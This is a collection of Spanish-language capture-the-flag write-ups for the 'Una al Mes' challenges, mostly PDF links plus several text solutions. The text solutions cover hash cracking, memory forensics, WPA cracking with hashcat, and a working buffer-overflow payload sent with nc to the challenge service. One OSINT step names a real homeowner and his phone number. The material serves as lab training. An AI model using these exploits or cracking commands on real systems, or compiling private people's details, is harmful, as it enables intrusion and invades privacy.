42 | Tras revisarlo varias veces se empieza a observar que hay patrones repetidos por lo que inicialmente se piensa que se trata de un cifrado por substitución pero de varios caracteres (1 a N) en vez de 1 a 1.
43 | Al ver que se trata de largas cadenas de texto repetidas en vez de pequeños grupos de caracteres, se enfrentan estos bloques en líneas diferentes y se aprecia una diferencia en una línea intermedia, que es más larga porque contiene un texto diferente aproximadamente a su mitad.
44 |
45 | En donde el resto de líneas contiene el texto: "GVtCktleSBuYW1lOiBNUnhO" la larga tiene "[448333920e12dc9fd9c5e8c30e6b1ea2]:[b3f894165d6166da47d52ffbf77b5d87]"
46 |
47 | Aparentemente las cadenas serían hashes de 32 caracteres hexadecimales, concretamente MD5, lo que se confirma a través de https://www.onlinehashcrack.com/hash-identification.php.
48 |
49 | Se encuentra el match en texto claro de esos hash con la herramienta online https://crackstation.net/
50 |
51 | Hash Type Result
52 | 448333920e12dc9fd9c5e8c30e6b1ea2 md5 Gilfoyle
53 | b3f894165d6166da47d52ffbf77b5d87 md5 Satan
54 |
55 | Usuario: Gilfoyle (que se trata del afortunado que no vio destruirse su disco duro)
56 | Contraseña: Satan (que pega bastante bien con el personaje)
57 |
58 | Accedemos a la web indicada en el enunciado http://34.247.69.86/siliconvalley/episodio1/login.php e introducimos las credenciales descubiertas.
59 |
60 | Devuelve el siguiente texto con un enlace "Denuncia recibida: https://drive.google.com/open?id=10iguWjRmx3mB0Y4g9iRrJOIXZ1HIJ_zC"
61 | Se descarga, tratándose de una imagen JFIF/JPEG con una diligencia previa a un procedimiento judicial en la que, curiosamente, han tapado los datos confidenciales (esta vez sí lo han hecho bien, no como con la sentencia de "La manada").
62 | Siendo JFIF un formato de imagen que no permite capas ni transparencias, se asume que de la parte gráfica en sí no se podrá extraer más información, por lo que se intenta buscar en los metadatos.
63 | Directamente, en un primer intento, se abre la imagen con la herramienta HxD y en las primeras líneas, en formato XML, ya aparece una etiqueta interesante: "37.436712, -122.137837"
64 |
65 | Se introducen las coordenadas geográficas en Google Maps y nos señala una casa en la calle Webster St. en Palo Alto y que a primera vista su dueño no debería tener ninguna envidia de Richard y sus compañeros porque se gasta una muy buena casa y piscina.
66 | Bajando a Street View conseguimos ver el letrero del número de la casa: 2126.
67 |
68 | (Aquí, por un malentendido con el enunciado, seguimos buscando el número de teléfono de la casa y no el número de la propia vivienda...)
69 | En varias páginas inmobiliarias se confirma que un servidor no podrá permitirse esa casa ni con el salario de varias vidas... pero también en www.whitepages.com se observa que el dueño de la casa es William Nisley Neidig y en esa misma página se encuentra el número de teléfono del propietario (650) 328-2126.
70 |
71 | Siguiendo el formato a entregar como flag descrito en el enunciado (en md5 - se utiliza https://passwordsgenerator.net/md5-hash-generator/), se prueban las siguientes flags, todas sin éxito.
72 | 1-650-328-2126 => UAM{2b895dfd62750a9b841e1cda0cf3d690}
73 | (650) 328-2126 => UAM{34e955fa369d1c4417e8c7200a9ab2a4}
74 | 16503282126 => UAM{49c38af0aa2dbc8107511f205ea38bff}
75 | 6503282126 => UAM{da1ec48a01b7e2af0a5855bdd25b174f}
76 |
77 | Se relee el enunciado, se golpea uno contra la pared y se introduce como flag el número de la vivienda en hash md5.
78 | 2126 => UAM{3b92d18aa7a6176dd37d372bc2f1eb71}
79 |
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/tonicastillo/tonicastillo-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/tonicastillo/tonicastillo-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/1v4n/1v4n-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/1v4n/1v4n-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/arsenics/arsenics-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/arsenics/arsenics-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/bicacaro/bicacaro-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/bicacaro/bicacaro-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/darkeagle/darkeagle-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/j0n3/j0n3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/j0n3/j0n3-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/nachinho3/nachinho3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/nachinho3/nachinho3-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio2/rafamartos/rafamartos-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio2/rafamartos/rafamartos-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/1v4n/1v4n-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/1v4n/1v4n-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/bicacaro/bicacaro-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/darkeagle/darkeagle-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/j0n3/j0n3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/j0n3/j0n3-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/nachinho3/nachinho3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/nachinho3/nachinho3-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio3/rafamartos/rafamartos-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio3/rafamartos/rafamartos-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/darkeagle/DarkEagle-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/darkeagle/DarkEagle-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/j0n3/j0n3-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/j0n3/j0n3-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/julianjm/julianjm-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/julianjm/julianjm-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/nachinho3/nachinho3-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/nachinho3/nachinho3-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/oreos/oreos-episodio1-2.txt:
--------------------------------------------------------------------------------
1 | UNA AL MES (Diciembre 2018)
2 | **************************************************************************
3 |
4 | Categoría: Universo Marvel
5 | Episodio: 1 - 2ª Parte
6 |
7 | --------------------------------------------------------------------------
8 |
9 | 1. Descargamos el fichero adjunto de https://drive.google.com/open?id=1Hbo8lqq9QPAJGNCRM4aE5jHcZhILuGTN
10 |
11 | 2. Una vez descargado, lo descomprimimos:
12 |
13 | oreos# unzip image.zip
14 |
15 | Obtenemos un fichero image.raw con un dump.
16 |
17 | 3. Lanzamos volatility para averiguar el tipo de sistema operativo.
18 |
19 | oreos# volatility -f image.raw imageinfo
20 | Volatility Foundation Volatility Framework 2.6
21 | INFO : volatility.debug : Determining profile based on KDBG search...
22 | Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
23 | AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
24 | AS Layer2 : FileAddressSpace (/root/uam/marvell/ep2/image.raw)
25 | PAE type : No PAE
26 | DTB : 0x187000L
27 | KDBG : 0xf80002c08070L
28 | Number of Processors : 1
29 | Image Type (Service Pack) : 0
30 | KPCR for CPU 0 : 0xfffff80002c09d00L
31 | KUSER_SHARED_DATA : 0xfffff78000000000L
32 | Image date and time : 2018-12-20 15:48:02 UTC+0000
33 | Image local date and time : 2018-12-20 16:48:02 +0100
34 |
35 | El perfil de sistema operativo a usar es Win7SP1x64.
36 |
37 | 4. Listamos los ficheros para el usuario 'admin'
38 |
39 | oreos# volatility -f image.raw --profile=Win7SP1x64 filescan | grep "admin"
40 |
41 | Observamos algunos ficheros interesantes en el escritorio:
42 | 1 - flag.txt
43 | 2 - HydralarioHydra
44 | 3 - netcat...
45 |
46 | Hacemos un dump de los ficheros 1) y 2):
47 |
48 | oreos# volatility -f image.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000013dfcb730 -D .
49 | oreos# volatility -f image.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000013d563f20 -D .
50 |
51 | Cambiamos el nombre a los ficheros:
52 |
53 | oreos# mv file.None.0xfffffa80066d6d00.dat flag.txt
54 | oreos# mv file.None.0xfffffa80089e01c0.dat HydralarioHydra
55 |
56 | Los ficheros son:
57 | - flag.txt: ASCII text, with no line terminators
58 | - HydralarioHydra: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c03cee4c7f44b1055031fd53980bd22e47873ab1, not stripped
59 |
60 |
61 | 5. Tras analizar el binario y el fichero flag.txt, observamos lo siguiente:
62 |
63 | a. La función read_flag lee el contenido de flag.txt y lo almacena en una variable "flag" en la posición de memoria 0x084160A0
64 |
65 | int read_flag() // reads the first line of flag.txt into the global .bss buffer 'flag' (see below)
66 | {
67 | int v1; // [esp+0h] [ebp-18h] — getline's allocated-size out-parameter
68 | char *src; // [esp+4h] [ebp-14h] — line buffer allocated by getline
69 | int v3; // [esp+8h] [ebp-10h] — bytes read, or -1 on failure
70 | FILE *stream; // [esp+Ch] [ebp-Ch]
71 |
72 | src = 0;
73 | v1 = 0;
74 | stream = fopen("flag.txt", "r"); // relative path: resolved against the process's working directory
75 | if ( !stream )
76 | {
77 | printf("\nError leyendo fichero flag.txt");
78 | exit(1);
79 | }
80 | v3 = getline(&src, &v1, stream); // 'src' is heap-allocated here and never freed
81 | if ( v3 == -1 )
82 | exit(1);
83 | strcpy(flag, src); // unbounded copy into a fixed 0xC0-byte buffer: a longer line overflows 'flag'
84 | return fclose(stream);
85 | }
86 |
87 | .bss:084160A0 flag db 0C0h dup(?) ; DATA XREF: read_flag+8E↑o
88 |
89 | b. La función check_age comprueba el primer valor introducido por el usuario. Necesitamos que v2 valga 0 para que la función devuelva 1 (comparación final). Como el valor leído debe estar comprendido entre 9 y 99999 (mayor que 9 y no mayor que 99999), hay que provocar un truncamiento: v2 es de tipo int16 (16 bits, valor máximo 65535), por lo que al insertar 65536 (2^16) la conversión se desborda y v2 queda a 0.
90 |
91 | _BOOL4 check_age() // returns 1 only when the low 16 bits of the in-range input are zero
92 | {
93 | int v1; // [esp+8h] [ebp-10h] — 32-bit value read from the user
94 | __int16 v2; // [esp+Eh] [ebp-Ah] — 16-bit copy of v1
95 |
96 | __isoc99_scanf((const char *)&unk_84144D0, &v1); // format string not resolved by the decompiler (unk_84144D0); the value lands in the 32-bit v1
97 | if ( v1 > 99999 || v1 <= 9 )
98 | return 0;
99 | v2 = v1; // int -> __int16 truncation: the range check above only constrains v1, not the 16-bit copy
100 | printf("\nEdad: %d", (unsigned __int16)v1);
101 | return v2 == 0; // passes for any in-range v1 whose low 16 bits are zero (e.g. 65536)
102 | }
103 |
104 | Insertando el valor 65536 conseguimos saltar la primera prueba:
105 |
106 | oreos# python -c 'print("65536\n")' | ./HydralarioHydra
107 |
108 |
109 | Bienvenido al sistema de reclutamiento de agentes.
110 | ¡Veamos si tienes lo que hay que tener para ser parte de Hydra!
111 |
112 | Edad: 0
113 | Parece que tienes madera de agente... hagamos una ultima comprobacion...
114 | Cuentame el secreto y yo te contare el mio:
115 |
116 | c. La función tell_me_a_secret lee un valor de entrada. En este caso, aprovecharemos un buffer overflow.
117 |
118 | int tell_me_a_secret() // reads a whitespace-delimited token from stdin into a stack local
119 | {
120 | char v1; // [esp+8h] [ebp-10h] — one-byte stack buffer 16 bytes below the saved frame pointer
121 |
122 | printf("\nCuentame el secreto y yo te contare el mio: ");
123 | return __isoc99_scanf("%s", &v1); // unbounded "%s" into a 1-byte buffer: stack overflow; a length-bounded read (fgets with sizeof) would be the fix
124 | }
125 |
126 | python -c 'print("65536\n" + "A"*20 + "ABCD")' | strace ./HydralarioHydra
127 |
128 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x44434241} ---
129 |
130 | Observamos el buffer overflow para un buffer de 20 caracteres. Por lo tanto, aprovecharemos para introducir en el stack la llamada a la función que nos permita imprimir la flag. La función oculta "a" nos permite imprimir un valor pasado por parámetro. Invocaremos la llamada a dicha función e insertaremos por parámetro el valor de la variable flag del paso a).
131 |
132 | int __cdecl a(char *format) // 'format' comes straight from the caller and is used as a printf format string
133 | {
134 | puts("\nBuen trabajo!");
135 | printf(format); // caller-controlled format string (format-string bug); printf("%s", format) would print it safely
136 | return printf("\nAgente!");
137 | }
138 |
139 | oreos# readelf -a HydralarioHydra | grep FUNC
140 | 1: 00000000 0 FUNC GLOBAL DEFAULT UND getline@GLIBC_2.0 (2)
141 | 2: 00000000 0 FUNC GLOBAL DEFAULT UND printf@GLIBC_2.0 (2)
142 | 3: 00000000 0 FUNC GLOBAL DEFAULT UND fclose@GLIBC_2.1 (3)
143 | 4: 00000000 0 FUNC GLOBAL DEFAULT UND strcpy@GLIBC_2.0 (2)
144 | 5: 00000000 0 FUNC GLOBAL DEFAULT UND puts@GLIBC_2.0 (2)
145 | 7: 00000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.0 (2)
146 | 8: 00000000 0 FUNC GLOBAL DEFAULT UND __libc_start_main@GLIBC_2.0 (2)
147 | 9: 00000000 0 FUNC GLOBAL DEFAULT UND fopen@GLIBC_2.1 (3)
148 | 10: 00000000 0 FUNC GLOBAL DEFAULT UND __isoc99_scanf@GLIBC_2.7 (4)
149 | 28: 08414160 0 FUNC LOCAL DEFAULT 1 deregister_tm_clones
150 | 29: 084141a0 0 FUNC LOCAL DEFAULT 1 register_tm_clones
151 | 30: 084141e0 0 FUNC LOCAL DEFAULT 1 __do_global_dtors_aux
152 | 33: 08414210 0 FUNC LOCAL DEFAULT 1 frame_dummy
153 | 44: 084144b0 2 FUNC GLOBAL DEFAULT 1 __libc_csu_fini
154 | 45: 00000000 0 FUNC GLOBAL DEFAULT UND getline@@GLIBC_2.0
155 | 46: 08414150 4 FUNC GLOBAL HIDDEN 1 __x86.get_pc_thunk.bx
156 | 48: 00000000 0 FUNC GLOBAL DEFAULT UND printf@@GLIBC_2.0
157 | 49: 0841428d 64 FUNC GLOBAL DEFAULT 1 tell_me_a_secret
158 | 51: 00000000 0 FUNC GLOBAL DEFAULT UND fclose@@GLIBC_2.1
159 | 52: 084144b4 0 FUNC GLOBAL DEFAULT 15 _fini
160 | 54: 00000000 0 FUNC GLOBAL DEFAULT UND strcpy@@GLIBC_2.0
161 | 56: 00000000 0 FUNC GLOBAL DEFAULT UND puts@@GLIBC_2.0
162 | 58: 00000000 0 FUNC GLOBAL DEFAULT UND exit@@GLIBC_2.0
163 | 61: 00000000 0 FUNC GLOBAL DEFAULT UND __libc_start_main@@GLIBC_
164 | 62: 08414450 93 FUNC GLOBAL DEFAULT 1 __libc_csu_init
165 | 63: 00000000 0 FUNC GLOBAL DEFAULT UND fopen@@GLIBC_2.1
166 | 64: 08414216 119 FUNC GLOBAL DEFAULT 1 check_age
167 | 66: 08414140 2 FUNC GLOBAL HIDDEN 1 _dl_relocate_static_pie
168 | 67: 08414100 0 FUNC GLOBAL DEFAULT 1 _start
169 | 69: 084142cd 74 FUNC GLOBAL DEFAULT 1 a
170 | 71: 084143c8 129 FUNC GLOBAL DEFAULT 1 main
171 | 72: 00000000 0 FUNC GLOBAL DEFAULT UND __isoc99_scanf@@GLIBC_2.7
172 | 75: 080483ec 0 FUNC GLOBAL DEFAULT 12 _init
173 | 76: 08414317 177 FUNC GLOBAL DEFAULT 1 read_flag
174 |
175 | La función "a" se encuentra en la dirección 0x084142cd. Nuestro payload quedará de la siguiente forma:
176 |
177 | "\xCD\x42\x41\x08" + "\x00\x00\x00\x00" + "\xA0\x60\x41\x08" (dirección de "a", dirección de retorno ficticia y puntero a la variable flag, respectivamente), cuya llamada completa sería:
178 |
179 | python -c 'print("65536\n" + "A"*20 + "\xCD\x42\x41\x08" + "\x00\x00\x00\x00" + "\xA0\x60\x41\x08")' | ./HydralarioHydra
180 |
181 | Bienvenido al sistema de reclutamiento de agentes.
182 | ¡Veamos si tienes lo que hay que tener para ser parte de Hydra!
183 |
184 | Edad: 0
185 | Parece que tienes madera de agente... hagamos una ultima comprobacion...
186 | Cuentame el secreto y yo te contare el mio:
187 | Buen trabajo!
188 | UAM{EstaNoEsLaFlag}
189 | Violación de segmento
190 |
191 | El contenido del fichero flag.txt se imprime.
192 |
193 | 6. Una vez resuelto en local, localizaremos el servicio remoto donde realizaremos el exploiting para obtener la flag. Para ello, volvemos a usar volatility:
194 |
195 | oreos# volatility -f image.raw --profile=Win7SP1x64 netscan
196 |
197 | ....
198 | 0x13d880880 TCPv4 172.16.233.139:49166 34.247.69.86:9009 ESTABLISHED 1940 nc64.exe
199 | ....
200 |
201 | El servicio donde está corriendo la aplicación es 34.247.69.86:9009. Usaremos netcat para explotar el servicio.
202 |
203 | 7. Explotamos el servicio con el siguiente comando:
204 |
205 | oreos# python -c 'print("65536\n" + "A"*20 + "\xCD\x42\x41\x08" + "\x00\x00\x00\x00" + "\xA0\x60\x41\x08")' | nc 34.247.69.86 9009
206 | 65536
207 | AAAAAAAAAAAAAAAAAAAA�BA^H^@^@^@^@�`A^H
208 |
209 | Bienvenido al sistema de reclutamiento de agentes.
210 | ¡Veamos si tienes lo que hay que tener para ser parte de Hydra!
211 |
212 | Edad: 0
213 | Parece que tienes madera de agente... hagamos una ultima comprobacion...
214 | Cuentame el secreto y yo te contare el mio:
215 | Buen trabajo!
216 | UAM{f2d593fa4eb0cd1860ed80fb0f7236ca}
217 |
218 | 8. Obtenemos la flag:
219 |
220 | UAM{f2d593fa4eb0cd1860ed80fb0f7236ca}
221 |
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1-2/socialkas/socialkas-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1-2/socialkas/socialkas-episodio1-2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/1v4n/1v4n-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/1v4n/1v4n-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/arsenics/arsenics-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/arsenics/arsenics-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/bicacaro/bicacaro-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/darkeagle/DarkEagle-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/darkeagle/DarkEagle-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/j0n3/j0n3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/j0n3/j0n3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/julianjm/julianjm-episodio1.txt:
--------------------------------------------------------------------------------
1 | WRITEUP UNIVERSO MARVEL - Episodio 1 - 1ª parte
2 | ===============================================
3 |
4 | Partimos de un fichero .pcap con una captura de datos wifi 802.11. Vemos que tenemos un handshake WPA, así que pasamos al ataque por diccionario y le pasamos el rockyou.txt.
5 |
6 | Aquí tenemos dos opciones: usar aircrack-ng, que usa CPU y con el que conseguimos (en mi equipo) unas 4.000 claves por segundo y tardamos 20 minutos, o bien usar hashcat, que permite el uso de la GPU que tengamos y que multiplica por 35 la velocidad, reduciendo el tiempo de crackeo a unos 50 segundos.
7 |
8 | $ aircrack-ng capture-01.cap -w rockyou.txt
9 |
10 | $ cap2hccapx.bin capture-01.cap output.hccap
11 | $ hashcat-5.1.0/hashcat64.bin -m 2500 output.hccap rockyou.txt
12 |
13 |
14 | Obtenemos que la clave para la red "Hydra Corp" es hydra54321. Desciframos el pcap para luego analizarlo en wireshark:
15 |
16 | $ airdecap-ng -p hydra54321 -e "Hydra Corp" capture-01.cap
17 |
18 |
19 | Analizando el fichero generado (capture-01-dec.cap), vemos que hay peticiones a la web http://34.247.69.86/universomarvel/episodio1. Abrimos esa web en el navegador y comprobamos que podemos entrar con cualquier email y contraseña. La web tiene varios apartados, estando uno de ellos inaccesible (Ubicación de la base).
20 | Analizando las peticiones que se generan al pinchar cada enlace, vemos que todas llaman al script database.php?load=ALGO_EN_BASE32. Ese parámetro load contiene las palabras dashboard, calendario, misiones y mapas, codificadas en base32.
21 |
22 | Después de trastear un rato, nos damos cuenta de que al hacer una llamada a ese script sin cookies (concretamente sin la cookie de sesión), en lugar de código html nos devuelve un texto codificado en rot13 y posteriormente en base64. Este texto coincide con el que vemos desde el analizador de red del navegador.
23 |
24 | Haciendo la petición al recurso 'mapas', vemos que, en lugar de error, también recibimos un base64 que después de pasarle el rot13 nos queda así:
25 |
26 | $ curl -s 'http://34.247.69.86/universomarvel/episodio1/databases.php?load=NVQXAYLT' | base64 -d | rot13
27 | {"Ubicaciones": {
28 | "Base Principal": {
29 | "Nombre": "Isla Hydra",
30 | "Coords": "37°21′N 23°28′E",
31 | },
32 | "Base Secreta": {
33 | "Nombre": "Flag",
34 | "Coords": "UAM{46863d92858b486c29f759767e53e92f}",
35 | }
36 | }
37 |
38 | Y ahí tenemos la flag.
39 |
40 |
41 | Julián J. M.
42 | julianjm@gmail.com
43 | Telegram: @julianjm
44 |
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/masi/masi-episodio1.txt:
--------------------------------------------------------------------------------
1 | -------------------------------------------------------------------------------
2 | WRITE-UP UAM UNIVERSO-MARVEL EPISODIO 1 - PARTE 1
3 | -------------------------------------------------------------------------------
4 |
5 | ███▄ ▄███▓ ▄▄▄ ██████ ██▓
6 | ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▓██▒
7 | ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ▒██▒
8 | ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒░██░
9 | ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒░██░
10 | ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░░▓
11 | ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░
12 | ░ ░ ░ ▒ ░ ░ ░ ▒ ░
13 | ░ ░ ░ ░ ░
14 | Twitter: @masi_c64
15 | -------------------------------------------------------------------------------
16 | -------------------------------------------------------------------------------
17 |
18 | EPISODIO 1 - 1ª PARTE
19 | Misión:
20 | El agente Coulson ha capturado una trama de comunicación de una base de Hydra.
21 | Tu objetivo será analizarla para descubrir la ubicación de la base secreta donde Hydra mantiene oculta su base de operaciones especiales.
22 | Buena suerte, el éxito de nuestra misión depende de ti.
23 | Nick Furia.
24 | Enlace de descarga de la trama: https://drive.google.com/open?id=1ltE42DQvMe-q_qVBbgeKQXvvTEiRyhwq
25 | Info: La flag tiene el formato UAM{md5}
26 |
27 | -------------------------------------------------------------------------------
28 | -------------------------------------------------------------------------------
29 |
30 | Descargamos el cap y lo convertimos a hccapx para prepararlo para el hashcat, con la herramienta online:
31 | https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
32 |
33 | Lanzamos el hashcat y, si hacemos un checkpoint para seguir más tarde, utilizamos --restore para continuar:
34 | hashcat -m 2500 uam-um-01.hccapx /usr/share/wordlists/rockyou.txt --force
35 | hashcat --restore
36 |
37 | Resultado:
38 | 463b8a83cc1f44e6d6da50cbaa3992a6:e0915345eadd:f0421c95e8ae:Hydra Corp:hydra54321
39 |
40 | Session..........: hashcat
41 | Status...........: Cracked
42 | Hash.Type........: WPA/WPA2
43 | Hash.Target......: Hydra Corp (AP:e0:91:53:45:ea:dd STA:f0:42:1c:95:e8:ae)
44 | Time.Started.....: Sat Dec 15 15:08:25 2018 (33 mins, 3 secs)
45 | Time.Estimated...: Sat Dec 15 15:41:28 2018 (0 secs)
46 |
47 | Desciframos los mensajes del cap según:
48 | https://wiki.wireshark.org/HowToDecrypt802.11
49 |
50 | Generamos la WPA-PSK online: http://jorisvr.nl/wpapsk.html
51 | HEX: 7fb1ae7fbbf1a7af5ed51bd3171fe7619c5f545844cd575ca8b8b00ef61e3b62
52 |
53 | Vemos paquetes de la dirección 192.168.105.190 a la dirección 34.247.69.86, haciendo un GET /universomarvel/episodio1 HTTP/1.1
54 | 0000 47 45 54 20 2f 75 6e 69 76 65 72 73 6f 6d 61 72 GET /universomar
55 | 0010 76 65 6c 2f 65 70 69 73 6f 64 69 6f 31 20 48 54 vel/episodio1 HT
56 | 0020 54 50 2f 31 2e 31 0d 0a TP/1.1..
57 |
58 | En http://34.247.69.86/universomarvel/ hay un test.html con un "He", pero no parece que podamos hacer nada con él.
59 | En http://34.247.69.86/universomarvel/episodio1/ aparece un login.html que nos pide usuario y contraseña.
60 | Ponemos cualquier cosa en login y pass y entramos:
61 | masi@masi.uam
62 | password
63 |
64 | Damos vueltas por los links y vemos que las peticiones de cada link tienen una llamada especial, y que el último link, que es el que nos interesa, nos da un error: "No tienes permisos para ver las ubicaciones".
65 |
66 | Vamos al burp para ir capturando las peticiones.
67 |
68 | BURP:
69 | En el portal de hydra comprobamos las peticiones:
70 |
71 | GET /universomarvel/episodio1/databases.php?load=NVQXAYLT HTTP/1.1
72 | Host: 34.247.69.86
73 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
74 | Accept: text/html, */*; q=0.01
75 | Accept-Language: en-US,en;q=0.5
76 | Accept-Encoding: gzip, deflate
77 | X-Requested-With: XMLHttpRequest
78 | Referer: http://34.247.69.86/universomarvel/episodio1/panel.php
79 | Cookie: PHPSESSID=vrtjgr77bj605ha7bmfi31b6f6
80 | Connection: close
81 |
82 |
83 | Estos son los posibles valores del menú del admin panel:
